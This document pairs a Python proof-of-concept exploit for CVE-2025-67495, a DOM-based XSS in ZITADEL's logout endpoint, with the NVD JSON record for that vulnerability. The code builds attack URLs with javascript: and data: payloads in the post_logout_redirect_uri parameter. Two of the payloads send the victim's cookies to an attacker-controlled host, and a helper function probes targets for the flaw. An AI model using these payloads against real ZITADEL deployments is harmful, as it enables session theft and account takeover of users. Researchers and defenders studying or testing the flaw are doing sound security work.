CVE-2025-67495

import urllib.parse # CVE-2025-67495 PoC - ZITADEL DOM-based XSS via logout endpoint # Target: ZITADEL instances versions 4.0.0-rc.1 to 4.7.0 def generate_xss_payload(): """ Generate various XSS payloads for exploiting the DOM-based XSS in ZITADEL logout endpoint via post_logout_redirect parameter. """ base_url = "https://vulnerable-zitadel-instance.com/logout" # Payload 1: Basic JavaScript execution payload1 = "javascript:alert(document.cookie)" # Payload 2: Cookie stealing with external endpoint # Replace 'attacker.com' with actual attacker-controlled server payload2 = "javascript:fetch('https://attacker.com/steal?c='+document.cookie)" # Payload 3: Session hijacking via document.domain manipulation payload3 = "javascript:var img=new Image();img.src='https://attacker.com/log?'+document.cookie" # Payload 4: Using data: protocol payload4 = "data:text/html,<script>alert(document.cookie)</script>" # Encode payloads encoded_payload1 = urllib.parse.quote(payload1) encoded_payload2 = urllib.parse.quote(payload2) # Generate attack URLs urls = { "basic_xss": f"{base_url}?post_logout_redirect_uri={encoded_payload1}", "cookie_stealing": f"{base_url}?post_logout_redirect_uri={encoded_payload2}", "data_protocol": f"{base_url}?post_logout_redirect_uri={urllib.parse.quote(payload4)}" } return urls def verify_target(url): """ Verify if target is vulnerable by checking for specific patterns. This is a simplified check - full verification requires browser automation. """ import requests try: response = requests.get(url, timeout=10, allow_redirects=False) # Check if the parameter is reflected in response if 'post_logout_redirect' in response.text.lower(): return "Potential vulnerability - parameter reflected in response" return "Target may not be vulnerable or not ZITADEL" except requests.RequestException as e: return f"Error: {str(e)}" if __name__ == "__main__": print("CVE-2025-67495 PoC - ZITADEL DOM-based XSS") print("=" * 50) payloads = generate_xss_payload() for name, url in payloads.items(): print(f"\n{name.upper()}:") print(url) print("\n" + "=" * 50) print("Note: User interaction required. Victim must have multiple active sessions.") print("Mitigation: Upgrade to ZITADEL 4.7.1 or later.")

{"cve": {"id": "CVE-2025-67495", "sourceIdentifier": "[email protected]", "published": "2025-12-09T23:15:59.933", "lastModified": "2025-12-19T18:30:55.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZITADEL is an open-source identity infrastructure tool. Versions 4.0.0-rc.1 through 4.7.0 are vulnerable to DOM-Based XSS through the Zitadel V2 logout endpoint. The /logout endpoint insecurely routes to a value that is supplied in the post_logout_redirect GET parameter. As a result, unauthenticated remote attacker can execute malicious JS code on Zitadel users’ browsers. To carry out an attack, multiple user sessions need to be active in the same browser, however, account takeover is mitigated when using Multi-Factor Authentication (MFA) or Passwordless authentication. This issue is fixed in version 4.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.7.1", "matchCriteriaId": "E1B051D6-969F-4B70-BF3F-AFD77FB00251"}]}]}], "references": [{"url": "https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-v959-qxv6-6f8p", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}